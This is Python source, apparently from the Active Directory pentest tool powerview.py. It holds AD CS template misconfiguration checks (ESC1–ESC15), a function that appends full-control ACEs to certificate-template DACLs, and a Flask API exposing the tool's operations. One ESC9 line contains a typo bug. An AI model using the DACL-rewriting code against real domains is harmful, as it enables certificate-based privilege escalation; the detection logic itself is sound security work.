        self.authorized_signatures_required = False
        self.no_security_extension = False
        self.domain_sid = None
        self.current_user_sid = current_user_sid
        self.linked_group = linked_group
        self.ldap_session = ldap_session
    def get_owner_sid(self):
        return self.owner_sid

    def set_owner_sid(self, owner_sid):
        self.owner_sid = owner_sid

    def get_parsed_dacl(self):
        return self.parsed_dacl

    def set_parsed_dacl(self, parsed_dacl):
        self.parsed_dacl = parsed_dacl

    def get_certificate_name_flag(self):
        return self.certificate_name_flag

    def set_certificate_name_flag(self, certificate_name_flag):
        self.certificate_name_flag = certificate_name_flag

    def get_enrollment_flag(self):
        return self.enrollment_flag

    def set_enrollment_flag(self, enrollment_flag):
        self.enrollment_flag = enrollment_flag

    def get_extended_key_usage(self):
        return self.extended_key_usage

    def set_extended_key_usage(self, extended_key_usage):
        self.extended_key_usage = extended_key_usage

    def get_validity_period(self):
        return self.validity_period

    def set_validity_period(self, validity_period):
        self.validity_period = validity_period

    def get_renewal_period(self):
        return self.renewal_period

    def set_renewal_period(self, renewal_period):
        self.renewal_period = renewal_period

    def get_client_authentication(self):
        return self.client_authentication

    def set_client_authentication(self, client_authentication):
        self.client_authentication = client_authentication

    def get_enrollee_supplies_subject(self):
        return self.enrollee_supplies_subject

    def set_enrollee_supplies_subject(self, enrollee_supplies_subject):
        self.enrollee_supplies_subject = enrollee_supplies_subject

    def get_any_purpose(self):
        return self.any_purpose

    def set_any_purpose(self, any_purpose):
        self.any_purpose = any_purpose

    def get_enrollment_agent(self):
        return self.enrollment_agent

    def set_enrollment_agent(self, enrollment_agent):
        self.enrollment_agent = enrollment_agent

    def set_requires_manager_approval(self, requires_manager_approval):
        self.requires_manager_approval = requires_manager_approval

    def get_requires_manager_approval(self):
        return self.requires_manager_approval

    def get_authorized_signatures_required(self):
        return self.authorized_signatures_required

    def set_authorized_signatures_required(self, authorized_signatures_required):
        self.authorized_signatures_required = authorized_signatures_required

    def get_no_security_extension(self):
        return self.no_security_extension

    def set_no_security_extension(self, no_security_extension):
        self.no_security_extension = no_security_extension

    def resolve_flags(self):
        # resolve certificate name flag
        self.set_certificate_name_flag(self.template["msPKI-Certificate-Name-Flag"].raw_values[0])
        if self.certificate_name_flag is not None:
                self.set_certificate_name_flag(MS_PKI_CERTIFICATE_NAME_FLAG(
                    int(self.certificate_name_flag)
                ))
        else:
            self.set_certificate_name_flag(MS_PKI_CERTIFICATE_NAME_FLAG(0))

        # resolve enrollment flag
        self.set_enrollment_flag(self.template["msPKI-Enrollment-Flag"].raw_values[0])
        if self.enrollment_flag is not None:
            self.set_enrollment_flag(MS_PKI_ENROLLMENT_FLAG(int(self.enrollment_flag)))
        else:
            self.set_enrollment_flag(MS_PKI_ENROLLMENT_FLAG(0))

        # resolve authorized signature
        self.set_authorized_signatures_required(self.template["msPKI-RA-Signature"].raw_values[0])
        if self.authorized_signatures_required is not None:
                self.set_authorized_signatures_required(int(self.authorized_signatures_required))
        else:
            self.set_authorized_signatures_required(0)

        # resolve no_security_extension
        self.set_no_security_extension((
                MS_PKI_ENROLLMENT_FLAG.NO_SECURITY_EXTENSION in self.enrollment_flag
            ))

        # resolve pKIExtendedKeyUsage
        eku = self.template["pKIExtendedKeyUsage"].raw_values
        if not isinstance(eku, list):
            if eku is None:
                eku = []
            else:
                eku = [eku]

        eku = list(map(lambda x: x.decode(), eku))
        self.set_extended_key_usage(list(
                map(lambda x: OID_TO_STR_MAP[x] if x in OID_TO_STR_MAP else x, eku)
            ))

        self.set_any_purpose((
                "Any Purpose" in self.extended_key_usage or len(self.extended_key_usage) == 0
            ))

        self.set_client_authentication(self.any_purpose or any(
                eku in self.extended_key_usage
                for eku in [
                    "Client Authentication",
                    "Smart Card Logon",
                    "PKINIT Client Authentication",
                ]
            ))

        self.set_enrollment_agent(self.any_purpose or any(
                eku in self.extended_key_usage
                for eku in [
                    "Certificate Request Agent",
                ]
            ))

        self.set_enrollee_supplies_subject(any(
                flag in self.certificate_name_flag
                for flag in [
                    MS_PKI_CERTIFICATE_NAME_FLAG.ENROLLEE_SUPPLIES_SUBJECT,
                ]
            ))

        self.set_requires_manager_approval(
                MS_PKI_ENROLLMENT_FLAG.PEND_ALL_REQUESTS in self.enrollment_flag
        )

        # resolve validity period
        self.set_validity_period(filetime_to_str(self.template["pKIExpirationPeriod"].raw_values[0]))

        # resolve renewal_period
        self.set_renewal_period(filetime_to_str(self.template["pKIOverlapPeriod"].raw_values[0]))

    def can_user_enroll_template(self):
        enrollable_sids = []
        user_can_enroll = False
        for sid in get_user_sids(self.domain_sid, self.current_user_sid, self.ldap_session):
            if sid in self.parsed_dacl["Enrollment Rights"]:
                enrollable_sids.append(sid)
                user_can_enroll = True
        return user_can_enroll, enrollable_sids

    def check_vulnerable_template(self):
        vulns = {}
        user_can_enroll, enrollable_sids = self.can_user_enroll_template()
        if not self.get_requires_manager_approval() and not self.get_authorized_signatures_required():
            # ESC1
            # TODO: add another user_can_enroll logic
            self.parsed_dacl["Enrollment Rights"]
            if (user_can_enroll and self.get_enrollee_supplies_subject() and self.get_client_authentication()):
                vulns["ESC1"] = enrollable_sids

            # ESC2
            if user_can_enroll and self.get_any_purpose():
                vulns["ESC2"] = enrollable_sids

            # ESC3
            if user_can_enroll and self.get_enrollment_agent():
                vulns["ESC3"] = enrollable_sids

            # ESC9
            if user_can_enroll and self.get_no_security_extension():
                vunls["ESC9"] = "Vulnerable yayay"

            # ESC13
            if user_can_enroll and self.get_client_authentication() and self.template["msPKI-Certificate-Policy"] and self.linked_group:
                vulns["ESC13"] = enrollable_sids

            # ESC15
            if user_can_enroll and self.get_enrollee_supplies_subject() and int(self.template["msPKI-Template-Schema-Version"].raw_values[0]) == 1:
                vulns["ESC15"] = enrollable_sids
        

        # ESC4
        security = CertificateSecurity(self.template["nTSecurityDescriptor"].raw_values[0])
        owner_sid = security.owner

        if owner_sid in get_user_sids(self.domain_sid, self.current_user_sid, self.ldap_session):
            vulns["ESC4"] = [owner_sid]
        else:
            has_vulnerable_acl = False
            aces = security.aces
            vulnerable_acl_sids = set()
            
            for sid, rights in aces.items():
                if sid not in get_user_sids(self.domain_sid, self.current_user_sid, self.ldap_session):
                    continue

                ad_rights = rights["rights"] 
                ad_extended_rights = rights["extended_rights"]
                
                for right in [CERTIFICATE_RIGHTS.GENERIC_ALL, CERTIFICATE_RIGHTS.WRITE_OWNER, 
                             CERTIFICATE_RIGHTS.WRITE_DACL, CERTIFICATE_RIGHTS.WRITE_PROPERTY]:
                    if right in ad_rights:
                        vulnerable_acl_sids.add(sid)
                        has_vulnerable_acl = True
                
                if (CERTIFICATE_RIGHTS.WRITE_PROPERTY in ad_rights and
                    ('00000000-0000-0000-0000-000000000000' in ad_extended_rights and 
                     ad_rights & ACTIVE_DIRECTORY_RIGHTS.EXTENDED_RIGHT)):
                    vulnerable_acl_sids.add(sid)
                    has_vulnerable_acl = True

            if has_vulnerable_acl:
                vulns["ESC4"] = list(vulnerable_acl_sids)

        return vulns

    def create_object_ace(self,privguid,sid, mask=983551):
        nace = ldaptypes.ACE()
        nace['AceType'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE
        nace['AceFlags'] = 0x02 # inherit to child objects
        acedata = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE()
        acedata['Mask'] = ldaptypes.ACCESS_MASK()
        acedata['Mask']['Mask'] = mask # Full control
        acedata['ObjectType'] = string_to_bin(privguid)
        acedata['InheritedObjectType'] = b''
        acedata['Sid'] = ldaptypes.LDAP_SID()
        acedata['Sid'].fromCanonical(sid)
        assert sid == acedata['Sid'].formatCanonical()
        acedata['Flags'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT
        nace['Ace'] = acedata
        return nace
        
    def modify_dacl(self, sid, right_opt):
        permissions = {
                'all': {
                        'rights': [EXTENDED_RIGHTS_NAME_MAP["Enroll"], EXTENDED_RIGHTS_NAME_MAP["AutoEnroll"], EXTENDED_RIGHTS_NAME_MAP["All-Extended-Rights"]],
                        'mask': CERTIFICATE_RIGHTS.GENERIC_ALL,
                    },
                'enroll': {
                        'rights':[EXTENDED_RIGHTS_NAME_MAP["Enroll"], EXTENDED_RIGHTS_NAME_MAP["AutoEnroll"]],
                        'mask': CERTIFICATE_RIGHTS.GENERIC_ALL,
                    },
                'write': {
                        'rights':[EXTENDED_RIGHTS_NAME_MAP["Enroll"], EXTENDED_RIGHTS_NAME_MAP["AutoEnroll"]],
                        'mask':CERTIFICATE_RIGHTS.GENERIC_ALL,
                    }
                }
        sdData = self.template["nTSecurityDescriptor"].raw_values[0]
        security = CertificateSecurity(sdData)
        for guid in permissions.get(right_opt).get('rights'):
            security.sd['Dacl']['Data'].append(self.create_object_ace(guid, sid, mask=permissions.get(right_opt).get('mask')))
        return security.sd.getData() 

    def parse_dacl(self):
        user_can_enroll = False
        enrollment_rights = []
        all_extended_rights = []

        sdData = self.template["nTSecurityDescriptor"].raw_values[0]
        security = CertificateSecurity(sdData)
        self.owner_sid = security.owner
        if not self.domain_sid:
            self.domain_sid = '-'.join(self.owner_sid.split("-")[:-1])
        aces = security.aces

        for sid, rights in aces.items():
            # TODO: Fix Logic here
            # if sid in list(WELL_KNOWN_SIDS.keys()):
            #     continue

            if(EXTENDED_RIGHTS_NAME_MAP["Enroll"] in rights["extended_rights"]
               or EXTENDED_RIGHTS_NAME_MAP["Enroll"] in rights["extended_rights"]
               or EXTENDED_RIGHTS_NAME_MAP["AutoEnroll"] in rights["extended_rights"]
               or CERTIFICATE_RIGHTS.GENERIC_ALL in rights["rights"]
               ):
                enrollment_rights.append(sid)

            if (
                EXTENDED_RIGHTS_NAME_MAP["All-Extended-Rights"] in rights["extended_rights"]
            ):
                all_extended_rights.append(sid)

        rights_mapping = [
            (CERTIFICATE_RIGHTS.GENERIC_ALL, [], "Full Control Principals"),
            (CERTIFICATE_RIGHTS.WRITE_OWNER, [], "Write Owner Principals"),
            (CERTIFICATE_RIGHTS.WRITE_DACL, [], "Write Dacl Principals"),
            (
                CERTIFICATE_RIGHTS.WRITE_PROPERTY,
                [],
                "Write Property Principals",
            ),
        ]
        object_control_permissions = {}
        # acl
        for sid, rights in security.aces.items():
            rights = rights["rights"]

            for (right, principal_list, _) in rights_mapping:
                if right in rights:
                    principal_list.append(sid)

        for _, rights, name in rights_mapping:
            if len(rights) > 0:
                object_control_permissions[name] = rights

        self.parsed_dacl['Write Owner'] = object_control_permissions['Write Owner Principals']
        self.parsed_dacl['Write Dacl'] = object_control_permissions['Write Dacl Principals']
        self.parsed_dacl['Write Property'] = object_control_permissions['Write Property Principals']
        self.parsed_dacl['Enrollment Rights'] = enrollment_rights
        self.parsed_dacl['Extended Rights'] = all_extended_rights

        return self.parsed_dacl

class UTILS:
    @staticmethod
    def get_template_oid(oid_forest):
        oid_part_1 = get_random_num(10000000,99999999)
        oid_part_2 = get_random_num(10000000,99999999)
        oid_part_3 = get_random_hex(32)
        
        template_oid = f"{oid_forest}.{oid_part_1}.{oid_part_2}"
        templatename = f"{oid_part_2}.{oid_part_3}"

        return template_oid, templatename
        




from os import system

class bcolors:
	HEADER = '\033[95m'
	OKBLUE = '\033[94m'
	OKCYAN = '\033[96m'
	OKGREEN = '\033[92m'
	WARNING = '\033[93m'
	FAIL = '\033[91m'
	ENDC = '\033[0m'
	BOLD = '\033[1m'
	UNDERLINE = '\033[4m'

class Gradient:
	# from https://github.com/venaxyt/fade
	@staticmethod
	def fire(text):
		system(""); faded = ""
		green = 250
		for line in text.splitlines():
			faded += (f"\033[38;2;255;{green};0m{line}\033[0m\n")
			if not green == 0:
				green -= 25
				if green < 0:
					green = 0
		return faded

	@staticmethod
	def water(text):
		system(""); faded = ""
		green = 10
		for line in text.splitlines():
			faded += (f"\033[38;2;0;{green};255m{line}\033[0m\n")
			if not green == 255:
				green += 15
				if green > 255:
					green = 255
		return faded


#!/usr/bin/env python3
from flask import Flask, jsonify, request, render_template, Response
import logging
from contextlib import redirect_stdout, redirect_stderr
import io
import os
import sys
import threading
from datetime import date
import shlex
from argparse import Namespace
from powerview.web.api.helpers import make_serializable
from powerview.utils.parsers import powerview_arg_parse
from powerview.utils.constants import UAC_DICT
from powerview._version import __version__ as version

class APIServer:
	def __init__(self, powerview, host="127.0.0.1", port=5000):
		self.app = Flask(__name__, static_folder='../../web/front-end/static', template_folder='../../web/front-end/templates')
		cli = sys.modules['flask.cli']
		cli.show_server_banner = lambda *x: None

		self.powerview = powerview
		self.host = host
		self.port = port
		
		components = [self.powerview.flatName.lower(), self.powerview.args.username.lower(), self.powerview.args.ldap_address.lower()]
		folder_name = '-'.join(filter(None, components)) or "default-log"
		file_name = "%s.log" % date.today()
		self.log_file_path = os.path.join(os.path.expanduser('~/.powerview/logs/'), folder_name, file_name)
		self.history_file_path = os.path.join(os.path.expanduser('~/.powerview/logs/'), folder_name, '.powerview_history')

		# Define routes
		self.app.add_url_rule('/', 'index', self.render_index, methods=['GET'])
		self.app.add_url_rule('/dashboard', 'dashboard', self.render_dashboard, methods=['GET'])
		self.app.add_url_rule('/users', 'users', self.render_users, methods=['GET'])
		self.app.add_url_rule('/computers', 'computers', self.render_computers, methods=['GET'])
		self.app.add_url_rule('/dns', 'dns', self.render_dns, methods=['GET'])
		self.app.add_url_rule('/groups', 'groups', self.render_groups, methods=['GET'])
		self.app.add_url_rule('/ca', 'ca', self.render_ca, methods=['GET'])
		self.app.add_url_rule('/ou', 'ou', self.render_ou, methods=['GET'])
		self.app.add_url_rule('/gpo', 'gpo', self.render_gpo, methods=['GET'])
		self.app.add_url_rule('/utils', 'utils', self.render_utils, methods=['GET'])
		self.app.add_url_rule('/api/get/<method_name>', 'get_operation', self.handle_get_operation, methods=['GET', 'POST'])
		self.app.add_url_rule('/api/set/<method_name>', 'set_operation', self.handle_set_operation, methods=['POST'])
		self.app.add_url_rule('/api/add/<method_name>', 'add_operation', self.handle_add_operation, methods=['POST'])
		self.app.add_url_rule('/api/invoke/<method_name>', 'invoke_operation', self.handle_invoke_operation, methods=['POST'])
		self.app.add_url_rule('/api/remove/<method_name>', 'remove_operation', self.handle_remove_operation, methods=['POST'])
		self.app.add_url_rule('/api/convertfrom/<method_name>', 'convert_from_operation', self.handle_convert_from_operation, methods=['POST'])
		self.app.add_url_rule('/api/convertto/<method_name>', 'convert_to_operation', self.handle_convert_to_operation, methods=['POST'])
		self.app.add_url_rule('/api/get/domaininfo', 'domaininfo', self.handle_domaininfo, methods=['GET'])
		self.app.add_url_rule('/health', 'health', self.handle_health, methods=['GET'])
		self.app.add_url_rule('/api/connectioninfo', 'connectioninfo', self.handle_connection_info, methods=['GET'])
		self.app.add_url_rule('/api/logs', 'logs', self.generate_log_stream, methods=['GET'])
		self.app.add_url_rule('/api/history', 'history', self.render_history, methods=['GET'])
		self.app.add_url_rule('/api/ldap/rebind', 'ldap_rebind', self.handle_ldap_rebind, methods=['GET'])
		self.app.add_url_rule('/api/ldap/close', 'ldap_close', self.handle_ldap_close, methods=['GET'])
		self.app.add_url_rule('/api/execute', 'execute_command', self.execute_command, methods=['POST'])
		self.app.add_url_rule('/api/constants', 'constants', self.handle_constants, methods=['GET'])
		self.app.add_url_rule('/api/clear-cache', 'clear_cache', self.handle_clear_cache, methods=['GET'])

		self.nav_items = [
			{"name": "Explorer", "icon": "fas fa-folder-tree", "link": "/"},
			{"name": "Dashboard", "icon": "fas fa-chart-line", "link": "/dashboard"},
			{"name": "Modules", "icon": "fas fa-cubes", "subitems": [
				{"name": "Users", "icon": "far fa-user", "link": "/users"},
				{"name": "Computers", "icon": "fas fa-display", "link": "/computers"},
				{"name": "Groups", "icon": "fas fa-users", "link": "/groups"},
				{"name": "DNS", "icon": "fas fa-globe", "link": "/dns"},
				{"name": "CA", "icon": "fas fa-certificate", "link": "/ca"},
				{"name": "OUs", "icon": "fas fa-building", "link": "/ou"},
				{"name": "GPOs", "icon": "fas fa-building", "link": "/gpo"},
			]},
			{"name": "Utils", "icon": "fas fa-toolbox", "link": "/utils"},
			{"name": "Logs", "icon": "far fa-file-alt", "button_id": "toggle-command-history"},
		]

	def render_index(self):
		context = {
			'title': 'Powerview.py',
			'version': version,
			'nav_items': self.nav_items
		}
		return render_template('explorerpage.html', **context)
	
	def render_dashboard(self):
		context = {
			'title': 'Powerview.py - Dashboard',
			'version': version,
			'nav_items': self.nav_items
		}
		return render_template('dashboardpage.html', **context)

	def render_users(self):
		context = {
			'title': 'Powerview.py - Users',
			'nav_items': self.nav_items,
			'version': version,
			'ldap_properties': [
				{'id': 'all-toggle', 'name': 'All', 'active': 'false', 'attribute': '*'},
				{'id': 'samaccountname-toggle', 'name': 'sAMAccountname', 'active': 'true', 'attribute': 'sAMAccountName'},
				{'id': 'cn-toggle', 'name': 'cn', 'active': 'true', 'attribute': 'cn'},
				{'id': 'mail-toggle', 'name': 'mail', 'active': 'true', 'attribute': 'mail'},
				{'id': 'admincount-toggle', 'name': 'adminCount', 'active': 'true', 'attribute': 'adminCount'},
				{'id': 'userprincipalname-toggle', 'name': 'userPrincipalName', 'active': 'false', 'attribute': 'userPrincipalName'},
				{'id': 'useraccountcontrol-toggle', 'name': 'userAccountControl', 'active': 'false', 'attribute': 'userAccountControl'},
				{'id': 'objectclass-toggle', 'name': 'objectClass', 'active': 'false', 'attribute': 'objectClass'},
				{'id': 'description-toggle', 'name': 'description', 'active': 'false', 'attribute': 'description'},
				{'id': 'distinguishedname-toggle', 'name': 'distinguishedName', 'active': 'false', 'attribute': 'distinguishedName'},
				{'id': 'name-toggle', 'name': 'name', 'active': 'false', 'attribute': 'name'},
				{'id': 'objectguid-toggle', 'name': 'objectGUID', 'active': 'false', 'attribute': 'objectGUID'},
				{'id': 'objectsid-toggle', 'name': 'objectSid', 'active': 'false', 'attribute': 'objectSid'},
				{'id': 'title-toggle', 'name': 'title', 'active': 'false', 'attribute': 'title'},
				{'id': 'department-toggle', 'name': 'department', 'active': 'false', 'attribute': 'department'},
				{'id': 'company-toggle', 'name': 'company', 'active': 'false', 'attribute': 'company'},
				{'id': 'serviceprincipalname-toggle', 'name': 'servicePrincipalName', 'active': 'false', 'attribute': 'servicePrincipalName'},
				{'id': 'memberof-toggle', 'name': 'memberOf', 'active': 'false', 'attribute': 'memberOf'},
				{'id': 'accountexpires-toggle', 'name': 'accountExpires', 'active': 'false', 'attribute': 'accountExpires'}
			],
			'powerview_flags': [
				{'id': 'spn-toggle', 'name': 'SPN', 'active': 'false', 'attribute': 'servicePrincipalName'},
				{'id': 'trusted-to-auth-toggle', 'name': 'TrustedToAuth', 'active': 'false', 'attribute': 'trustedToAuth'},
				{'id': 'enabled-users-toggle', 'name': 'Enabled', 'active': 'false', 'attribute': 'enabled'},
				{'id': 'preauth-not-required-toggle', 'name': 'PreauthNotReq', 'active': 'false', 'attribute': 'preauthNotRequired'},
				{'id': 'pass-not-required-toggle', 'name': 'PasswdNotReq', 'active': 'false', 'attribute': 'passwordNotRequired'},
				{'id': 'admin-count-toggle', 'name': 'AdminCount', 'active': 'false', 'attribute': 'adminCount'},
				{'id': 'lockout-toggle', 'name': 'Lockout', 'active': 'false', 'attribute': 'lockout'},
				{'id': 'rbcd-toggle', 'name': 'RBCD', 'active': 'false', 'attribute': 'rbcd'},
				{'id': 'shadow-cred-toggle', 'name': 'Shadow Cred', 'active': 'false', 'attribute': 'shadowCred'},
				{'id': 'unconstrained-delegation-toggle', 'name': 'Unconstrained', 'active': 'false', 'attribute': 'unconstrainedDelegation'},
				{'id': 'disabled-users-toggle', 'name': 'Disabled', 'active': 'false', 'attribute': 'disabled'},
				{'id': 'password-expired-toggle', 'name': 'Password Expired', 'active': 'false', 'attribute': 'passwordExpired'}
			]
		}
		return render_template('userspage.html', **context)

	def render_computers(self):
		context = {
			'title': 'Powerview.py - Computers',
			'nav_items': self.nav_items,
			'version': version,
			'ldap_properties': [
				{'id': 'all-toggle', 'name': 'All', 'active': 'false', 'attribute': '*'},
				{'id': 'samaccountname-toggle', 'name': 'sAMAccountname', 'active': 'true', 'attribute': 'sAMAccountName'},
				{'id': 'cn-toggle', 'name': 'cn', 'active': 'true', 'attribute': 'cn'},
				{'id': 'operatingsystem-toggle', 'name': 'operatingSystem', 'active': 'true', 'attribute': 'operatingSystem'},
				{'id': 'description-toggle', 'name': 'description', 'active': 'false', 'attribute': 'description'},
				{'id': 'useraccountcontrol-toggle', 'name': 'userAccountControl', 'active': 'false', 'attribute': 'userAccountControl'},
				{'id': 'serviceprincipalname-toggle', 'name': 'servicePrincipalName', 'active': 'false', 'attribute': 'servicePrincipalName'},
				{'id': 'memberof-toggle', 'name': 'memberOf', 'active': 'false', 'attribute': 'memberOf'}
			],
			'powerview_flags': [
				{'id': 'spn-toggle', 'name': 'SPN', 'active': 'false', 'attribute': 'servicePrincipalName'},
				{'id': 'trusted-to-auth-toggle', 'name': 'Trusted To Auth', 'active': 'false', 'attribute': 'trustedToAuth'},
				{'id': 'enabled-computers-toggle', 'name': 'Enabled', 'active': 'false', 'attribute': 'enabled'},
				{'id': 'rbcd-toggle', 'name': 'RBCD', 'active': 'false', 'attribute': 'rbcd'},
				{'id': 'shadow-cred-toggle', 'name': 'Shadow Cred', 'active': 'false', 'attribute': 'shadowCred'},
				{'id': 'unconstrained-delegation-toggle', 'name': 'Unconstrained', 'active': 'false', 'attribute': 'unconstrainedDelegation'},
				{'id': 'disabled-computers-toggle', 'name': 'Disabled', 'active': 'false', 'attribute': 'disabled'},
				{'id': 'laps-toggle', 'name': 'LAPS', 'active': 'false', 'attribute': 'laps'},
				{'id': 'printers-toggle', 'name': 'Printers', 'active': 'false', 'attribute': 'printers'},
				{'id': 'bitlocker-toggle', 'name': 'Bitlocker', 'active': 'false', 'attribute': 'bitlocker'},
				{'id': 'gmsapassword-toggle', 'name': 'GMSA Password', 'active': 'false', 'attribute': 'gmsaPassword'},
				{'id': 'pre2k-toggle', 'name': 'Pre-2k', 'active': 'false', 'attribute': 'pre2k'},
				{'id': 'excludedcs-toggle', 'name': 'Exclude DC', 'active': 'false', 'attribute': 'excludeDC'}
			]
		}
		return render_template('computerpage.html', **context)

	def render_dns(self):
		context = {
			'title': 'Powerview.py - DNS',
			'nav_items': self.nav_items,
			'version': version,
		}
		return render_template('dnspage.html', **context)

	def render_groups(self):
		context = {
			'title': 'Powerview.py - Groups',
			'nav_items': self.nav_items,
			'version': version,
		}
		return render_template('grouppage.html', **context)

	def render_ca(self):
		context = {
			'title': 'Powerview.py - CA',
			'nav_items': self.nav_items,
			'version': version,
		}
		return render_template('capage.html', **context)

	def render_ou(self):
		context = {
			'title': 'Powerview.py - OUs',
			'nav_items': self.nav_items
		}
		return render_template('oupage.html', **context)

	def render_gpo(self):
		context = {
			'title': 'Powerview.py - GPOs',
			'nav_items': self.nav_items
		}
		return render_template('gpopage.html', **context)

	def render_utils(self):
		context = {
			'title': 'Powerview.py - Utils',
			'nav_items': self.nav_items
		}
		return render_template('utilspage.html', **context)

	def handle_get_operation(self, method_name):
		return self.handle_operation(f"get_{method_name}")

	def handle_set_operation(self, method_name):
		return self.handle_operation(f"set_{method_name}")

	def handle_add_operation(self, method_name):
		return self.handle_operation(f"add_{method_name}")

	def handle_invoke_operation(self, method_name):
		return self.handle_operation(f"invoke_{method_name}")

	def handle_remove_operation(self, method_name):
		return self.handle_operation(f"remove_{method_name}")

	def handle_convert_from_operation(self, method_name):
		return self.handle_operation(f"convertfrom_{method_name}")

	def handle_convert_to_operation(self, method_name):
		return self.handle_operation(f"convertto_{method_name}")

	def handle_constants(self):
		get_param = request.args.get('get', '')
		if get_param.lower() == 'uac':
			return jsonify(UAC_DICT)
		return jsonify({})

	def handle_domaininfo(self):
		domain_info = {
			'domain': self.powerview.domain,
			'root_dn': self.powerview.root_dn,
			'dc_dnshostname': self.powerview.dc_dnshostname,
			'flatName': self.powerview.flatName,
		}
		return jsonify(domain_info)
	
	def handle_clear_cache(self):
		success = self.powerview.clear_cache()
		return jsonify({'status': 'OK' if success else 'KO'}), 200 if success else 400
	
	def handle_connection_info(self):
		return jsonify({
			'domain': self.powerview.domain,
			'username': self.powerview.conn.get_username(),
			'sid': self.powerview.current_user_sid,
			'is_admin': self.powerview.is_admin,
			'status': 'OK' if self.powerview.is_connection_alive() else 'KO',
			'protocol': self.powerview.conn.get_proto(),
			'ldap_address': self.powerview.conn.get_ldap_address(),
			'nameserver': self.powerview.conn.get_nameserver(),
		})

	def execute_command(self):
		properties = [
			''
		]
		try:
			# Get the command from the request
			command = request.json.get('command', '')
			if not command:
				return jsonify({'error': 'No command provided'}), 400

			# Parse the command using shlex
			try:
				cmd = shlex.split(command)
			except ValueError as e:
				logging.error(f"Command parsing error: {str(e)}")
				return jsonify({'error': f'Command parsing error: {str(e)}'}), 400

			# Parse the command arguments using PowerView's argument parser
			pv_args = powerview_arg_parse(cmd)

			# Check if the command was parsed successfully
			if pv_args is None:
				return jsonify({'error': 'Invalid command or arguments'}), 400

			# Check if the module is specified
			if not pv_args.module:
				return jsonify({'error': 'No module specified in the command'}), 400

			# Execute the command using PowerView
			result = self.powerview.execute(pv_args)

			# Make the result serializable
			serializable_result = make_serializable(result)

			# Return the result along with pv_args
			return jsonify({'result': serializable_result, 'pv_args': vars(pv_args)}), 200

		except Exception as e:
			logging.error(f"Error executing command: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_health(self):
		return jsonify({'status': 'ok'})

	def handle_ldap_rebind(self):
		success = self.powerview.conn.reset_connection()
		return jsonify({'status': 'OK' if success else 'KO'}), 200 if success else 400

	def handle_ldap_close(self):
		success = self.powerview.conn.close()
		return jsonify({'status': 'OK' if success else 'KO'}), 200 if success else 400

	def render_history(self):
		try:
			with open(self.history_file_path, 'r') as history_file:
				history_lines = history_file.readlines()
				last_50_lines = history_lines[-50:]
				history = [line.strip() for line in last_50_lines]
			return jsonify({'result': history})
		except Exception as e:
			return jsonify({'error': str(e)}), 500

	def generate_log_stream(self):
		try:
			page = int(request.args.get('page', 1))
			limit = int(request.args.get('limit', 10))

			max_limit = 100
			if limit > max_limit:
				raise ValueError(f"Limit of {limit} exceeds the maximum allowed value of {max_limit}")

			with open(self.log_file_path, 'r') as log_file:
				all_logs = log_file.readlines()

			total_logs = len(all_logs)
			start = total_logs - (page * limit)
			end = start + limit

			if start < 0:
				start = 0

			paginated_logs = all_logs[start:end][::-1]  # Reverse the order to get the most recent logs first

			formatted_logs = []
			for log in paginated_logs:
				parts = log.split(' ', 3)
				if len(parts) >= 4:
					timestamp = parts[0] + ' ' + parts[1]
					user = parts[2]
					log_type = parts[3].split(' ', 1)[0]
					debug_message = parts[3].split(' ', 1)[1].strip() if len(parts[3].split(' ', 1)) > 1 else ''
					formatted_logs.append({
						'timestamp': timestamp.strip('[]'),
						'user': user,
						'log_type': log_type,
						'debug_message': debug_message
					})

			return jsonify({'logs': formatted_logs, 'total': total_logs, 'page': page, 'limit': limit})
		except Exception as e:
			return jsonify({'error': str(e)}), 500

	def handle_operation(self, full_method_name):
		method = getattr(self.powerview, full_method_name, None)
		
		if not method:
			return jsonify({'error': f'Method {full_method_name} not found'}), 404

		params = request.args.to_dict() if request.method == 'GET' else request.json or {}

		if 'args' in params:
			params['args'] = Namespace(**params['args'])
		
		try:
			result = method(**params)
			serializable_result = make_serializable(result)
			return jsonify(serializable_result)
		except Exception as e:
			if self.powerview.args.stack_trace:
				raise e
			else:
				logging.error(f"Powerview API Error: {full_method_name}: {str(e)}")
			return jsonify({'error': str(e)}), 400

	def start(self):
		log = logging.getLogger('werkzeug')
		log.disabled = True

		with redirect_stdout(io.StringIO()), redirect_stderr(io.StringIO()):
			self.api_server_thread = threading.Thread(
				target=self.app.run,
				kwargs={'host': self.host, 'port': self.port, 'debug': False},
				daemon=True
			)
			logging.info(f"Powerview web listening on {self.host}:{self.port}")
			self.api_server_thread.start()